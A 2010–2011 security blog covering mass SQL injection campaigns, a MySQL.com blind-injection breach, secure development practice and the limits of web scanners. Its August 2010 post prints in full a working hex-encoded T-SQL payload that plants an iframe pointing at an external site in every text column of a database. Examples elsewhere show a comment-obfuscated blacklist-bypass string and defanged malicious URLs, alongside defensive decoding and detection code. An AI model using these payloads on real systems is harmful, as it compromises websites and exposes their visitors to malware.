Thursday, March 31, 2011

lizamoon.com + Mass SQL Injection

I've been following another mass SQL injection attack that inserts a piece of code into the page, which results in a redirect to a rogue anti-virus site.

A Google search for the injected code returned close to 226,000 URLs at the time of writing.


Update 10:42 EST: I've identified a few other domains hosting similar injection files. The consistency and similarity of the file details indicate that the injection attacks started in 2010. The URLs below are defanged (hxxp) on purpose; do not browse to them.

hxxp://alexblane.com/ur.php
hxxp://sol-stats.info/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php

Tuesday, March 29, 2011

MySQL.com + Blind SQLi

MySQL.com was found vulnerable to a blind SQL injection over the weekend. The dump revealed usernames and password hashes. You can find the list, and attempts at cracking the hash values, here.

Thursday, February 17, 2011

SQL Injection continues into 2011

What do Lush, recruitireland.com, eHarmony, five oil and gas companies, HBGary and Nasdaq have in common? Each was targeted and exploited through a vulnerability class that is over ten years old: every one of them was found vulnerable to SQL injection and compromised.

The question is whether these organizations built their queries by string concatenation and relied on a keyword blacklist that was bypassed by obfuscation. I guess we'll never know; the one thing we do know is that this technique is far from over.
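The failure mode described above, as an added example that is not code from the original post: a query built by concatenation behind a keyword blacklist, the obfuscated input that slips past the blacklist, and the parameterized query that is immune to the same input. It assumes an in-memory SQLite database (via Python's sqlite3) with a constructed users table; the incidents above involved other databases, but the concatenation mistake and the fix are the same.

```python
"""Concatenation plus a keyword blacklist versus a parameterized query.

Added example, not code from the original post. Uses an in-memory SQLite
database (Python's sqlite3) and a constructed users table so it runs offline.
"""
import sqlite3

# The kind of token filter a home-grown "sanitizer" might apply to user input.
BLACKLIST = ("' or ", " union ", "--", ";")


def make_db():
    """Constructed sample table; the rows are illustrative only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    conn.executemany(
        "INSERT INTO users (name, pw_hash) VALUES (?, ?)",
        [("alice", "h1"), ("bob", "h2"), ("carol", "h3")],
    )
    return conn


def find_user_blacklisted(conn, name):
    """Vulnerable: the value is concatenated into SQL text after a blacklist check."""
    if any(bad in name.lower() for bad in BLACKLIST):
        raise ValueError("rejected by blacklist")
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return sorted(row[0] for row in conn.execute(sql))


def find_user_parameterized(conn, name):
    """Fixed: the value is bound as a parameter, so it can never become SQL syntax."""
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return sorted(row[0] for row in rows)


# Obfuscated input: inline comments replace the spaces the blacklist keys on,
# so "' or " never appears, yet the database still parses it as OR.
BYPASS = "x'/**/OR/**/1=1/**/OR/**/'a'='a"

if __name__ == "__main__":
    db = make_db()
    try:
        find_user_blacklisted(db, "x' or 1=1 --")
    except ValueError as err:
        print("naive input:", err)
    print("obfuscated input, concatenated query:", find_user_blacklisted(db, BYPASS))
    print("obfuscated input, parameterized query:", find_user_parameterized(db, BYPASS))
```

The blacklist stops the textbook `' or 1=1 --` and nothing else; the parameterized version needs no filter at all, because the bound value is never parsed as SQL.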

Wednesday, February 9, 2011

SafeCode - secure development guide

The paper prescribes new and updated security practices that should be applied during the Design, Programming and Testing activities of the software development lifecycle. These practices have been shown to be effective across diverse development environments.

A guide to the most effective secure development practices in use today.

http://www.safecode.org/publications/SAFECode_Dev_Practices0211.pdf


Wednesday, December 1, 2010

Secure Coding vs Web Automated Scanners

I often get the question whether automated web scanners have a place within the SDLC. I have a canned response to that: "yes and no".

Many organizations adopt the "catch all" syndrome: leaving security to the end, where it becomes expensive and tedious, and hoping that the one thing that will save the organization from financial and reputational losses is an automated web scanner. A single attempt at locating risks this way is not ideal and will fail. Consider the dynamic aspects of an application and the limitations an automated scanner has when crawling it.

Security must be built into an application from its inception. Each stage of the SDLC, from requirements gathering through design, development, testing and deployment, must include security-focused activities. Testing for security at each stage gives you far greater assurance that identified risks will be addressed and corrected prior to deployment.

Code review is the ideal way to validate the security posture of your application, but automated scanners do have their place. It is up to the tester operating the scanner to properly identify the application's components. Combined with the application's risk management and an understanding of its functions and data handling, it is possible to reach a secure application.

Wednesday, August 18, 2010

Another Mass SQL Injection Attack

I've been following yet another mass SQLi attack, particularly over the last three days. The obfuscated query once again attempts to bypass common filters. The query below is one that has been in circulation:

declare%20@s%20varchar(4000);set%20@s=cast(0x6445634c417245204054207661526368615228323535292c406320
764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e61
6d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e6964
20614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e7854595
0653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d2
05461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657
845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722
834303030292c5b272b40432b275d29292b636153542830783343363936363732363136443635323037333732363333443232363837343
73437303341324632463645363536443646363837353639364336343639363936453245373237353246373436343733324636373646324
53730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343
34432323330323232303733373437393643363533443232363436393733373036433631373933413645364636453635323233453343324
6363936363732363136443635334520615320766152434861722831303629292729204645544368204e6578742066526f6d207441426c65
5f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c6
55f435552736f7220%20as%20varchar(4000));exec(@s);--

The query uses CAST, as we saw in many attempts in 2008 and 2009, to convert data types: the real T-SQL travels as a hex literal (0x...), CAST turns it into a varchar(4000), and exec(@s) runs it, so no keyword in the payload is visible to a filter that inspects the raw request. Decoded, it declares a cursor over sysobjects and syscolumns for every text-type column (xtype 35, 99, 167 and 231: text, ntext, varchar, nvarchar) of every user table and, for each one, runs UPDATE to append a hidden iframe pointing at an external site. That iframe is itself hidden inside a second, nested CAST of a hex literal, and the keywords are in mixed case (dEcLArE, sysObjeCts, exEc) to defeat case-sensitive blacklists.

The last time I checked, over 500,000 sites had been compromised.
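An added example (not code from the original post) for unwrapping and flagging this pattern. SAMPLE_PAYLOAD is a constructed payload with the same structure as the query above (URL-encoded wrapper, hex literal into CAST, exec(@s), and a second hex-encoded CAST nested inside); it is not the in-the-wild bytes, and the inner markup is a bare script tag rather than the real iframe. decode_layers peels every layer; is_suspect is the check a WAF rule or log triage script would apply after URL-decoding.

```python
"""Decode and flag the hex-encoded CAST/EXEC pattern used by the mass SQLi payloads.

Added example, not code from the original post. SAMPLE_PAYLOAD is constructed
to match the structure of the real query; it is not the in-the-wild bytes.
"""
import re
from urllib.parse import unquote

# Inner T-SQL in the same mixed-case style; its own CAST hides the injected markup
# (here a constructed "<script></script>", 17 chars, rather than the real iframe).
INNER_TSQL = (
    "dEcLaRe @t vArChAr(255),@c vArChAr(255); "
    "exEc('UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@c+']))"
    "+caST(0x3C7363726970743E3C2F7363726970743E aS vArChAr(17))')"
)

# Outer wrapper as it would arrive in a URL-encoded request parameter.
SAMPLE_PAYLOAD = (
    "declare%20@s%20varchar(4000);set%20@s=cast(0x"
    + INNER_TSQL.encode("ascii").hex()
    + "%20as%20varchar(4000));exec(@s);--"
)

HEX_CAST = re.compile(r"cast\(\s*0x([0-9a-f]+)\s+as\s+(?:n?var)?char", re.I)


def decode_layers(raw):
    """Return every hex-encoded layer found in a request value, outermost first.

    Each decoded layer is scanned again, so a CAST nested inside a CAST (as in the
    real payload, where the iframe is hex-encoded a second time) is also unwrapped.
    """
    layers = []
    pending = [unquote(raw)]
    while pending:
        text = pending.pop(0)
        for match in HEX_CAST.finditer(text):
            try:
                decoded = bytes.fromhex(match.group(1)).decode("latin-1")
            except ValueError:  # odd-length or damaged hex: skip that layer
                continue
            layers.append(decoded)
            pending.append(decoded)
    return layers


# Three independent markers of the pattern; requiring two of them keeps ordinary
# text that happens to contain "cast" or "exec" from firing.
MARKERS = (
    re.compile(r"declare\s+@\w+", re.I),
    re.compile(r"exec\s*\(", re.I),
    re.compile(r"cast\s*\(\s*0x[0-9a-f]{16,}", re.I),
)


def is_suspect(value):
    """Flag a request value after URL-decoding it, so %20 and mixed case do not help."""
    decoded = unquote(value)
    return sum(1 for marker in MARKERS if marker.search(decoded)) >= 2


if __name__ == "__main__":
    for i, layer in enumerate(decode_layers(SAMPLE_PAYLOAD), 1):
        print(f"layer {i}: {layer}")
    print("suspect:", is_suspect(SAMPLE_PAYLOAD))
```

Match on the decoded text, not the raw bytes: the whole point of the hex literal is that the keywords never appear in the request as sent, and the mixed case means every regex has to be case-insensitive.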

Thursday, June 17, 2010

Hacking Under the Radar

The 26th edition of (IN)SECURE Magazine was recently published. I had the opportunity to submit an article based on some research that I conducted a short time ago. You can find the article here.